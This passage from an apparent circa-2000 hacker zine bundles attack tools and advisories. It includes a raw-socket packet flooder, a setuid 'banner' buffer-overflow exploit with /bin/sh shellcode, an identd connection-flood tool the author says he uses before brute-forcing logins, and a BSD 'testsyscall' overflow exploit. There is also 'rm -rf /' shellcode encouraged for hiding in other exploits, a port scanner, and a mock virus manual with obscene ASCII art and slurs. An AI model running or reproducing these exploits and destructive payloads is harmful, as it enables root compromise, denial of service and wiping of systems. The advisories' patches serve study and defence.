if ((raw_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR)
{
fprintf(stream, "> Raw socket could not be created: %s\n",
strerror(errno));
exit(EXIT_FAILURE);
}
else if ( (setsockopt(raw_sock, IPPROTO_IP, IP_HDRINCL, (char *)&yes,
sizeof(yes)) == ERR) ||
(setsockopt(raw_sock, SOL_SOCKET, SO_BROADCAST, (char *)&yes,
sizeof(yes)) == ERR) )
{
fprintf(stream, "> Could not set socket opts: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
fprintf(stream,
"> fin.c FIN attack\n");
fprintf(stream, "> author: lore\n");
fprintf(stream, "> victim: %s\n", strip(victim));
signal(SIGINT, ctrlc);
fprintf(stream, "> Hit Ctrl-C to abort\n");
while (TRUE)
{
if (send_fin_packet(victim) == ERR)
die(EXIT_FAILURE);
}
die(EXIT_SUCCESS);
}
void ctrlc (int useless)
{
die (EXIT_SUCCESS);
}
void die (int code)
{
fprintf(stream, "> Flood ended\n");
shutdown(raw_sock, 2);
free(packet_buf);
exit(code);
}
u_long res (char * host)
{
u_long ipaddr;
struct hostent * hp;
if ((ipaddr = inet_addr(host)) == ERR)
{
if (!(hp = gethostbyname(host))) return (FALSE);
memcpy(&ipaddr, hp->h_addr, hp->h_length);
}
return (ipaddr);
}
char * strip (u_long ipaddr)
{
struct in_addr addr;
addr.s_addr = ipaddr;
return (inet_ntoa(addr));
}
void usage (char * pname)
{
fprintf(stream,
"Usage: %s <victim>\n", pname);
exit(EXIT_SUCCESS);
}
size_t send_fin_packet (u_long to)
{
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 137, IPPROTO_TCP,
inet_addr("1.3.3.7"), to, NULL, 0, packet_buf);
libnet_build_tcp(0x1337, 80, libnet_get_prand(PRu32), libnet_get_prand(PRu32)
, TH_ACK|TH_SYN, libnet_get_prand(PRu16), 0, NULL, 0,
packet_buf + TCP_H);
libnet_do_checksum(packet_buf, IPPROTO_TCP, TCP_H);
return libnet_write_ip(raw_sock, packet_buf, TCP_H + IP_H);
}
[END_CUT] f1n.c
____________________________________
.-' `-.
[08]| banner advisory |[08]
[08]| by: |[08]
[08]| lore |[08]
`-.____________________________________.-'
Here are some advisories + exploits for banner. Note: banner
has to be setuid root for you to get a root shell. I've seen
banner setuid root on various .jp systems. Regards -- lore
[CUT_HERE] banner.adv
-------------------------------------------------------------------------------
| www.insomnia.org/~lore |
|
|
| Topic : A user may become that of another user via 'banner' |
| Program : /usr/bin/banner - banner |
| Released : 2000-05-21 |
| Credits : insomnia.org, r00tabega.com |
| Corrected : See below. |
| Vender status : Notified |
-------------------------------------------------------------------------------
Background information:
-----------------------
Banner is a popular tool, used to create banners.
Problem description:
--------------------
Banner takes a message, and enlarges it based on a width field.
Banner may take the message as an argument to main(), or as input() using
fgets(). Multiple messages may be included in the banner. Using multiple
arguments when executing the program, one can concatenate multiple messages
to the banner. When no banner message argument is given, this does not include
flags such as the width flag, banner uses standard input. In these two phases,
one can exploit banner. The banner 'char message[]' is of a constant MAXMSG.
Banner does not take into account bounds checking. By supplying a message,
greater than MAXMSG, one can exploit banner.
(lore@insomnia~#) banner 10000 A's
Segmentation fault
Now let's peek at the code.
/* Have now read in the data. Next get the message to be printed. */
if (*argv) {
strcpy(message, *argv);
while (*++argv) {
strcat(message, " ");
strcat(message, *argv);
}
nchars = strlen(message);
} else {
fprintf(stderr,_("Message: "));
(void)fgets(message, sizeof(message), stdin);
nchars = strlen(message);
message[nchars--] = '\0'; /* get rid of newline */
}
Notice the terrible unsafe use of strcpy() and fgets(). One who is
aspiring to write secure code, may wish to use the 'n' set of functions.
Easily changing strcpy() to strncpy(), with correct use of strncpy(), will
fix phase 1. Easily changing fgets() syntax to fgets(message,sizeof(message)-1,
...); will fix phase 2.
IMPACT:
-------
A malicious user maybe root if banner is setuid root. One may say,
banner is undoubtably never setuid root, au contraire it is. Let's take a look
at boxes i found with default installment of banner.
Slackware 7.0 Linux Operating System
# ls -al /usr/bin/banner
-rwsr-xr-x 1 root bin 17492 Aug 1 1999 /usr/bin/banner*
Solaris 7 Operating System
# ls -al /bin/banner
-r-sr-xr-x 1 bin bin 6456 Sep 1 1998 /bin/banner
FreeBSD 4.0 Operating System,
-r-sr-xr-x 1 root wheel 15664 Mar 20 21:31 /usr/bin/banner
From the above we conclude that on a Slackware 7.0 Linux Operating
System, we may ascertain root privledges. On a Solaris 7 Operating System, we
may ascertain bin privledges. On a FreeBSD 4.0 Operating System, we may
ascertain root privledges. This vulnerability, in effect, is actually very
serious.
WORKAROUND:
-----------
Install the patches below.
Please note that, a patch for strcat() in phase 1 has not been
included.
patch1_phase1.diff:
1061c1061
< strcpy(message, *argv);
---
> strncpy(message, *argv, sizeof(message)-1);
patch2_phase2.diff:
1069c1069
< (void)fgets(message, sizeof(message), stdin);
---
> (void)fgets(message, sizeof(message)-1, stdin);
1070a1071,1072
> if(nchars > MAXMSG)
> nchars = MAXMSG;
GREETS:
-------
r00tabega, insomnia, w00w00, ADM, USSR Labs, and TREATY
[END_CUT] banner.adv
[CUT_HERE] bexp.c
/*
* banner.c exploit
* lore
*
* banner exploit which works with all versions of slackware
*
* Note: banner has to be setuid root (30% of systems i ran accross had
* banner installed suid root)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char hellcode[] =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh.........";
/*
* From banner.c
*/
#define MAXSEG (1024)
#define BSIZE (MAXSEG)
#define ESIZE ((BSIZE+8))
#define PATH ("/usr/bin/banner")
#define OFFSET (400)
#define NOP (0x90)
int main __P((int, char **));
long get_esp __P((void));
long
get_esp(void)
{
__asm__("movl %esp, %eax");
}
int
main(int argc, char **argv)
{
int offset,
i,
j;
long addr;
char *evilbanner;
evilbanner = (char *) malloc(ESIZE);
offset = OFFSET;
for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i)
evilbanner[i] = NOP;
for (j = 0; i < (ESIZE - 4); ++j, ++i)
evilbanner[i] = hellcode[j];
if (argc > 1)
offset = atoi(argv[1]);
addr = (get_esp() - offset);
*(long *) (evilbanner + i) = addr;
fprintf(stderr, "banner exploit, lore\n");
fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset);
execl(PATH, "banner", evilbanner, NULL);
}
[END_CUT] bexp.c
____________________________________
.-' `-.
[09]| identd killer |[09]
[09]| by: |[09]
[09]| lore |[09]
`-.____________________________________.-'
I use this on boxes like hackphreak.org. The trick is to
kill identd, then they will irc with their real login ID
as the userid. Now we can brute force the box with a
telnet brute forcer. Regards -- lore
[CUT_HERE] identd_kill.c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#define TIMEOUT 4
void * TREATY_kill(struct sockaddr_in *sin)
{
int sfd, flags;
void on_alrm(int s) {
close(s);
pthread_exit(NULL);
}
pthread_detach(pthread_self());
//signal(SIGALRM,on_alrm);
sfd = socket(AF_INET, SOCK_STREAM, 0);
if(sfd < 0)
{
perror("socket");
pthread_exit(NULL);
}
//alarm(TIMEOUT);
flags = fcntl(sfd, F_GETFL);
flags |= O_NONBLOCK;
fcntl(sfd, F_SETFL, flags);
if(connect(sfd, (struct sockaddr *)sin, sizeof(struct sockaddr_in))<0 && errno
!= EINPROGRESS)
{
perror("connect");
pthread_exit(NULL);
}
pthread_exit(NULL);
}
int main(int argc, char *argv[])
{
struct sockaddr_in sin;
pthread_t p;
int n,x;
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(113);
(argc>2)?x=atoi(argv[2]):20;
for(;x--;)
{
n = pthread_create(&p, NULL, (void *)&TREATY_kill, &sin);
if(n)
{
printf("pthread_create erroed or somehting\n");
exit(-1);
}
pthread_join(p, NULL);
}
return 1;
}
[END_CUT] identd_kill.c
[END_DIR] lore
____________________________________
.-' `-.
[10]| testsyscall |[10]
[10]| by: |[10]
[10]| Team Hackphreak |[10]
`-.____________________________________.-'
Exploit for every BSD (local). That includes *YOU* OpenBSD.
[BEGIN_DIR] testsyscall
[CUT_HERE] testsyscall.adv
- HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % -
| www.hackphreak.org |
| |
| Version : Hackphreak advisory #1 of many |
| Author : RLoxley |
| Contributed : shinex@suburbs.net |
| Topic : A user may become that of another user via "testsyscall" |
| Or gain remote access via "testsyscall" |
| Program : /usr/share/lkm/test/testsyscall.c - testsyscall |
| Released : June the 9th, 2000 |
| Credits : www.hackphreak.org, www.condemned.org, EHAP, PARSE, |
| our friends at packetstorm :) |
| Corrected : See below. |
| Vender status : Notified |
- HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % HP1 advisory % -
Preface:
--------
I, RLoxley, am writing this advisory. It was not my intention
to release an actual working exploit with this advisory. Although, my
friend shinex (currently working his way up team hackphreak ;) hey xf0rce!)
insisted on including one. I, do not endorse script kiddism, please read
some of my ethics articles at hackphreak.org (hackphreak.org/newbie).
"Ethics can take you a long long way" -- RLoxley
Background information:
-----------------------
"testsyscall" was written to test out a special syscall LKM -
(LOADABLE KERNEL MODULE). It can be piped via the "inetd" daemon, or run
as regular.
Problem description:
--------------------
testsyscall uses standard input, it parses a system call number,
and executes that syscall with the syscall() function. The syscall number,
in the test, is that of the loaded module's syscall entry. When reading
standard input from the user, testsyscall DOES NOT CHECK bounds. The
internal buffer that data is copied to, is only 80 bytes. gets() returns
when a newline is encountered. A malicious use can write a trivial exploit
within a matter of a few minutes. By typing input longer than 80 bytes, one
can overflow the internal buffer. By supplying specially crafted shellcode,
one can exploit testsyscall.
# ./testsyscall
Table offset as reported by modstat: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bad system call (core dumped)
# gdb ./testsyscall ./testsyscall.core
GNU gdb 4.17
#0 0x40019c11 in ?? () from /usr/lib/libc.so.12.40
(gdb) bt
#0 0x40019c11 in ?? () from /usr/lib/libc.so.12.40
#1 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)
As you can see, we've completely over written the Program Counter.
Here is where the vulnerability is encountered
* $NetBSD: testsyscall.c,v 1.2 1997/10/13 11:20:53 lukem Exp $
*/
#include <stdio.h>
main()
{
char buf[ 80];
int err = 0;
printf( "Table offset as reported by modstat: ");
if( gets( buf) == NULL) {
printf( "[ABORT]\n");
exit( 1);
}
For an in-depth analysis of gets(), look below. Notice how gets() is being
used very unsafe. I can't believe developers at OpenBSD, NetBSD, FreeBSD,
would allow such an idiotic programming error. Maybe Team Hackphreak
could participate in your ports auditing mission ;).
Problem description of gets():
------------------------------
gets() is very unsafe. gets() does not check the length of the input
against the internal buffer memory area. A secure programmer should use
fgets(), or fgetc() in a loop().
Impact:
-------
A malicious user may gain access to a xBSD server remotly, if
testsyscall is running off inetd.
A malicious user may crash the testsyscall service if running off
of inetd.
A malicious user may gain higher level access than which he or she
has had before by exploiting testsyscall.
Please do not assume a 'malicious user' means someone trusted on
the system. This testsyscall vulnerabilty can be used in the
'hacker-walk-the-chain' penetration method.
Also, one may crash the server, via giving the input a non-number,
which will cause a system call crash core dump.
Workaround:
-----------
Install the patch below.
# cat hp_testsyscall_patch.diff
49c49
< if( gets( buf) == NULL) {
---
> if( fgets( buf, 50, stdin) == NULL) {
Exploit:
--------
In such a short notice, shinex put this together. We thank him
from team hackphreak.
// testsyscall.c exploit by shinex
// made for rlox
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char shellcode[] =
"\xeb\x23"
"\x5e"
"\x8d\x1e"
"\x89\x5e\x0b"
"\x31\xd2"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\x88\x56\x19"
"\x31\xc0"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xd8\xff\xff\xff"
"/bin/sh"
"\x01\x01\x01\x01"
"\x02\x02\x02\x02"
"\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";
unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
FILE * pi;
char *buf,*p;
unsigned long *adr;
int i,off;
if(argc < 2)
{
puts("usage, testsyscallexploit \"path_to_testsyscall\" \"optional_offset\"");
exit(-1);
}
if (argc>2)
off=atoi(argv[2]);
else off=4;
printf("using buffer delta:%d\n",off);
if((p = buf = malloc(2268+28+off))==NULL)
exit(-1);
memset(p, 0x90, 2268+off);
p += 2268+off - strlen(shellcode);
for(i = 0; i < strlen(shellcode); i++)
*p++ = shellcode[i];
adr = (long *)p;
for(i = 0; i < 7; i++)
*adr++ = get_esp();
p = (char *)adr;
*p = 0;
pi = popen(argv[1], "w");
if(pi == NULL) {
perror("popen");
exit(-1);
}
*p = '\n';
*(p+1) = '\0';
if(fwrite(buf, strlen(buf), 1, pi)<0)
{
perror("fwrite");
exit(-1);
}
//execl(argv[1], argv[1],buf, NULL);
}
Source:
-------
To examine and learn
/*
* testsyscall.c
*
* Test program to call the sample loaded system call.
*
* 23 May 93 Terry Lambert Original
*
*
* Copyright (c) 1993 Terrence R. Lambert.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Terrence R. Lambert.
* 4. The name Terrence R. Lambert may not be used to endorse or promote
* products derived from this software without specific prior written
* permission.
*
* THIS SOFTWARE IS PROVIDED BY TERRENCE R. LAMBERT ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE TERRENCE R. LAMBERT BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* $Id: testsyscall.c,v 1.1.1.1 1995/10/18 08:44:21 deraadt Exp $
*/
#include <stdio.h>
main()
{
char buf[ 80];
int err = 0;
printf( "Table offset as reported by modstat: ");
if( gets( buf) == NULL) {
printf( "[ABORT]\n");
exit( 1);
}
if( err = syscall( atoi( buf) /* no arguments*/))
perror( "syscall");
exit( err);
}
/*
* EOF -- This file has not been truncated
*/
GREETS:
-------
team hackphreak, EHAP, condemnation, lore, shinex, rhino9, and of
course, packetstorm
TO HELL WITH YOU'S:
-------------------
Paedophiles, rascists, all of #kkk on undernet, all the people who
disturb my channel, BoW, frys / prophet
[END_CUT] testsyscall.adv
[END_DIR] testsyscall
____________________________________
.-' `-.
[11]| rm -rf / sh3llk0dez |[11]
[11]| by: |[11]
[11]| str8 phr0m the s3w3r! |[11]
`-.____________________________________.-'
th3ze k0dez r br0ught to uz by 0ur de4l p4l str8 phr0m
th3 s3w3r. uze w1th cuati0n. put th3m in all y0r expl0itz
and d1str0 W0RLDW1DE. 0k n0w g00d luq rm'n b0x3z.
[BEGIN_DIR] misc
[CUT_HERE] rmsh3llk0dez
// ~el8 sh3llk0de: t3st3d 0n linux 2.2.s0meth1ng
// sh0uld b ez t0 p0rt t0 y0r f4v0r1te arch1tecture lyke
// dre4msc4pe or s0me shyt. uz3 w1th c4re th1s w1ll rm th3
// b0x. iph u re4lly w4nn4 g0 h4rdk0re, exec sh w1th rm -rf
// and put 1t in the b4ckgr0und. th1s is l3ft t0 the av1d
// re4der. n0te, uze a n1ce ebp or wh4tevr th4t 1z.
unsigned char ev1lrmb0xk0d3[] =
"\xeb\x44" // ~el8 taken 0ver -- 2001
"FAREWELL_MOTHERFUCKER!:>" // f1ght the p0wer -- 2001
"\x99" // k1ll whitey -- 2001
"\x89\xd0" // bl4q p0wer -- 2001
"\xb0\x17" // h4il w1po -- 2001
"\x89\xd3" // r1p k0dez -- 2001
"\xcd\x80" // terr0riz old l4diez X'n the stre4t -- 2001
"\x5b" // g3t l4id -- 2001
"\xb0\x0b" // rm s0me mfq'n b0xez -- 2001
"\x88\x53\x07" // KILL THE BOX
"\x88\x53\x0b" // MAKE IT DEAD
"\x88\x53\x0d" // STRANGLE THE BOX
"\x89\x5d\xf0" // MAKE IT DEAD
"\x8d\x4b\x08" // KILL THE ADMIN
"\x89\x4d\xf4" // MAKE HIM DEAD
"\x8d\x4b\x0c" // RM THE BOX
"\x89\x4d\xf8" // MAKE IT CRY
"\x89\x55\xfc" // BEAT THE ADMIN
"\x8d\x4d\xf0" // MAKE HIM HIDE
"\xcd\x80" // SAY FAREWALL
"\xe8\xcf\xff\xff\xff" // NOW THE BOX HAZ DIED
"/bin/rmX-rfX/X" // poem -- ~el8[2001]
;
[END_CUT] rmsh3llk0dez
[END_DIR] misc
____________________________________
.-' `-.
[12]| slowscan.c |[12]
[12]| by: |[12]
[12]| hybrid |[12]
`-.____________________________________.-'
Coded for phrack55, yet not included.
[BEGIN_DIR] misc
[CUT_HERE] slowscan.c
/*
* slowscan.c
*
* by hybrid [proof of concept code]
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <netinet/in.h>
int main(int argc, char * argv[])
{
struct sockaddr_in sin;
int fd,i,max=65535;
fd=socket(AF_INET,SOCK_STREAM,0);
if(fd<0)
puts("error"),exit(-1);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
for(i=0;i<=max;i++)
{
sleep(atoi(argv[2])*1440);
sin.sin_port=htons(i);
if(connect(fd,(struct sockaddr *)&sin,sizeof(sin))<0)
continue;
else printf("port %i is open!\n", i);
}
close(fd);
return(0);
}
[END_CUT] slowscan.c
[END_DIR] misc
____________________________________
.-' `-.
[13]| putpenis.c |[13]
[13]| by: |[13]
[13]| FUNNY__BUNNY |[13]
`-.____________________________________.-'
This was coded while @ CCC camp:
[BEGIN_DIR] homosexual
[CUT_HERE] putpenis.c
#include <stdio.h>
#include <string.h>
void putpenis(char *str)
{
fprintf(stderr, "\r%s", str);
usleep(rand()%60000+30000);
return;
}
int main(int argc, char **argv)
{
printf("watch %s's ass get owned by %s!!\n",(argc>1)?argv[1]:"route",
(argc>2)?argv[2]:"cripto");
while(1)
{
putpenis("8====D (_O_)");
putpenis(" 8====D(_O_)");
putpenis(" 8====D_O_)");
putpenis(" 8====DO_)");
putpenis(" 8====D_)");
putpenis(" 8====_)");
putpenis(" 8===_)");
putpenis(" 8====_)");
putpenis(" 8====D_)");
putpenis(" 8====D_O_)");
putpenis(" 8====D(_O_)");
}
return 0;
}
[END_CUT] putpenis.c
[END_DIR] homosexual
____________________________________
.-' `-.
[14]| THE UNIX VIRUS CHILDRENS MANUAL |[14]
[14]| by: |[14]
[14]| silvio |[14]
`-.____________________________________.-'
[BEGIN_DIR] misc
[CUT_HERE] virus.txt
THE UNIX VIRUS CHILDRENS MANUAL
- Silvio Cesare <silvio@big.net.au>
CONTENTS
--------
IMPROVING THIS MANUAL
WHAT IS A VIRUS?
WHAT CAN A UNIX VIRUS DO?
WHAT CAN A WINDOWS VIRUS DO?
WHAT DO UNIX VIRUS'S LOOK LIKE?
IMPROVING THIS MANUAL
---------------------
For any comments or suggestions (even just to say hi) please contact the author
Silvio Cesare, <silvio@big.net.au>. This paper already has future plans to
include more parasite descriptions and more parasite teqniques. Plus, i plan
on writing a POP-UP book about virus's and how wonderful virus's are.
WHAT IS A VIRUS?
----------------
A virus is code that infects program files, critical files, processes, ELF's,
and mission critical data. Here are some pictures to help you :)
(Parents: please take time to discuss the pictures, preferably to keep them
from getting scared)
A WAREZ infector (The BoW virus):
_||||||||||||||||||||||||_
/ \
/ \_/ \
| \____ _____/ |
| / o /\ /\ o \ |
| \___/ \___/ |
| /\ |
\ ______________________ /
\_ .____| | | |____. _/
\ |___| |___| /
\______________________/
_____| |_____
/ \
| |
| / __________ \ |
|\/\/\| I LUV BOW! |\/\/\|
| ~~~~~~~~~~ |
| |
< >
( b0rn 2 1nf3ct! )
\__________________/
Notice, the very sharp hands, and very big head, which contains million
s and zillions of program code to infect your system and make it sick.
An ELF infector virus (Clifford The Big Red Virus):
/-------------\
| , |
| O ^ o |
[| M |]
| U |
\___________/
| | | | | |
/ \ \ \ \ / \
/ \ |/ \ | \ \
| \|\ // | \
/ \ / \ \ / \
Notice it's U shaped mouth, which acts as a suction cup. Also, notice
its many many tenticles! They are used to spread throughout your system
very very quickly, and can cause it to instantly die! This is a naughty
virus. One drawback of this virus, is it is:
1) Very hard to program
2) Has poor eye site (notice there are no pupils)
A windows virus (The BLOB!):
_____________________________
( )
( )
( Memo to Sandy: )
( Hey Sandy ............. )
( )
(!!!!!!!!!!!!!!!!!!!!!!!!!!!!!)
( O o O o O o O o O o O o O o )
( o O o O o O o O o O o O o O )
( O o O O o o O o o O O o O o )
( \/\/ \/\/\/\/ \/\/ \/\/\/ \/)
( @ )
( /\ /\/\/\ /\/\/\/\ /\/\/\/\ )
( O o O o O o O o O o O o O o )
( o O o O o O o O o O o O o O )
( O o O O o o O o o O O o O o )
(!!!!!!!!!!!!!!!!!!!!!!!!!!!!!)
( )
( Aol, no wonder it's #1 )
( Text file! )
(_____________________________)
This virus is very hard to detect. Notice how the nasty mean angry
part of the virus is in the middle, while outside of the virus, it just
looks like a regular file! This virus has many eyes, and viscious teeth
! It can trick Norton's, and so forth.
The gH virus (LamegHost):
, ; , .-'"""'-. , ; ,
\\|/ .' '. \|//
\-;-/ .. \-;-/
// ; ; \\
//__; :. .; ;__\\
`-----\'.'-.....-'.'/-----'
'.'.-.-,_.'.'
'( (..-'
'-'
This virus turns your operating system into a flood network, to DoS
people on irc, it also downloads rootshell.com and hack.co.za directly
to your box, and then loads a backdoor into every daemon in inetd.
Very naughty virus, it was used on whitehouse.gov.
That sums up the intro, on to WHAT CAN A UNIX VIRUS DO?
WHAT CAN A UNIX VIRUS DO?
--------------------
Virus's are very fascinating, their very existance is superior to that of the
mind controling human. A UNIX virus can do basically anything with the correct
privledges.
ME UNIX
o o <- [ Can i have ] 01010101010100 -> [ Why yes ]
_\ [ ROOT access] 01010101010100 [ you may.]
. . [ please ? ] 01010101010101
\____/ 01010101010011
01010110101010
Once you have the correct permissions, here's what you can do:
Infect many processes on the system:
_____
.' '.
/ O o \
| |
| \ / |
\ '---' /
'._____.'
_____ _____
.' '. .' '.
/ O o \ / o O \
| | | |
| \ / | | \ / |
\ '---' / \ '---' /
'._____.' '._____.'
_____ _____ _____
.' '. .' '. .' '.
/ O o \ / O O \ / o O \
| | | | | |
| \ / | | \ / | | \ / |
\ '---' / \ '---' / \ '---' /
'._____.' '._____.' '._____.'
_____ _____ _____ _____
.' '. .' '. .' '. .' '.
/ o o \ / o O \ / O o \ / o o \
| | | | | | | |
| \ / | | \ / | | \ / | | \ / |
\ '---' / \ '---' / \ '---' / \ '---' /
'._____.' '._____.' '._____.' '._____.'
This shows how the virus's spread. Look at each ones eyes, they differ
from the other. This is what we call maximum stealthism! It makes it
hard for virus detectors to find the virus's.
Backdoor the systems:
(telnet system 31337) (*:backdoor LISTEN)
hacker system
O -> [] -> |----|
< | - |
|\ |____|
A hacker (yourself) can gain access to a system, and run even more
virus. Running many virus's is called a "parade" amongst us virus
writers.
Destroy your system:
$ ls
fork():unable to fork new process
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
THE SANDMAN VIRUS HAS YOUR WEAK SOUL
Rewriting MBR...done
Removing init...done
Removing /usr/bin/printf..............done
Rebooting!
This virus hides, waiting, forever if it hasto, then, when all
recources are used up, BAM!!!!!!!!!!!! IT DESTROYS YOUR SYSTEM.
Expose you to vile paraphanalia:
@@@
@. .@
@\=/@
.- -.
o /(.|.)\
| \ ).( /
8======D~~ '( v )`
|\ \|/
(|)
'-`
This virus randomly prints pornographic ascii images to your console.
In conclusion, a unix virus can do anything to your system. Onto the next
section WHAT CAN A WINDOWS VIRUS DO?
WHAT CAN A WINDOWS VIRUS DO
---------------------------
Windows95/98 VIRII are very different from UNIX VIRII (VIRII meaning VIRUS
plural). The most popular of Windows95/98 VIRII can be found at
www.virusexchange.com. Some examples of what Windows VIRII can do are:
Mess with financial software databses like the Divinci virus.
Delete all of your HTTP cookies.
Delete your system using the deltree command.
Run netbus or back orifice on your system, and make it impossible to remove.
Make copies of itself, go into stealth mode, and permutate ( increase
their existance ) themselves like rabbits onto your system.
Alter the memory of another process on your system.
ex: Altering notepad when writing critical notes to your friends in
elementary school.
Get all of the buddies on your buddy list and send them the trojan, this
happened with the famous internet worm by Robert Morris.
Turn your system into a WAREZ server.
Get credit card information for your system.
Change your bootup system image (to a pornagraphic one, you will likely get
grounded, happyhacker.org teaches you howto do this).
Change the shutdown system image (to a pornagraphic one, you will likely get
grounded, happyhacker.org teaches you howto do this).
Make really loud annoying sounds at night.
Ok, that is the end of this section, onto WHAT DO UNIX VIRUS'S LOOK LIKE?
Parents: Review this material with your children, three times through.
WHAT DO UNIX VIRUS'S LOOK LIKE?
-------------------------------
Unix virii are hard to spot, this section gives you some info on howto spot
them and write them for fun.
Smiley the Virus:
_____
.' '.
/ O o \
| |
| \ / |
\ '---' /
'._____.'
Dalnet, the Virus:
@@@
@. .@
@\=/@
.- -.
o /(.|.)\
| \ ).( /
8======D~~ '( v )`
|\ \|/
(|)
'-`
(NOTE: This is how DALNET got its name)
The gH virus (LamegHost):
, ; , .-'"""'-. , ; ,
\\|/ .' '. \|//
\-;-/ .. \-;-/
// ; ; \\
//__; :. .; ;__\\
`-----\'.'-.....-'.'/-----'
'.'.-.-,_.'.'
'( (..-'
'-'
(NOTE: Used in the incredible whitehouse.gov defacement)
An ELF infector virus (Clifford The Big Red Virus):
/-------------\
| , |
| O ^ o |
[| M |]
| U |
\___________/
| | | | | |
/ \ \ \ \ / \
/ \ |/ \ | \ \
| \|\ // | \
/ \ / \ \ / \
A WAREZ infector (The BoW virus):
_||||||||||||||||||||||||_
/ \
/ \_/ \
| \____ _____/ |
| / o /\ /\ o \ |
| \___/ \___/ |
| /\ |
\ ______________________ /
\_ .____| | | |____. _/
\ |___| |___| /
\______________________/
_____| |_____
/ \
| |
| / __________ \ |
|\/\/\| I LUV BOW! |\/\/\|
| ~~~~~~~~~~ |
| |
< >
( b0rn 2 1nf3ct! )
\__________________/
Enourmous Penis Virus (Aka, Big John):
8======================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
===============================================================================
======================================D
(NOTE: This virus fills up your file system, quickly)
The Million Man March (Aka Lots`o`penis):
8========D~~~ 8========D~~~8========D~~~8========D~~~8========D~~~8========D~~
~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~
8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~8========D~~~
8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8======
==D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~8
========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8========D~~~ 8====
====D~~~ 8========D~~~ 8========D~~~
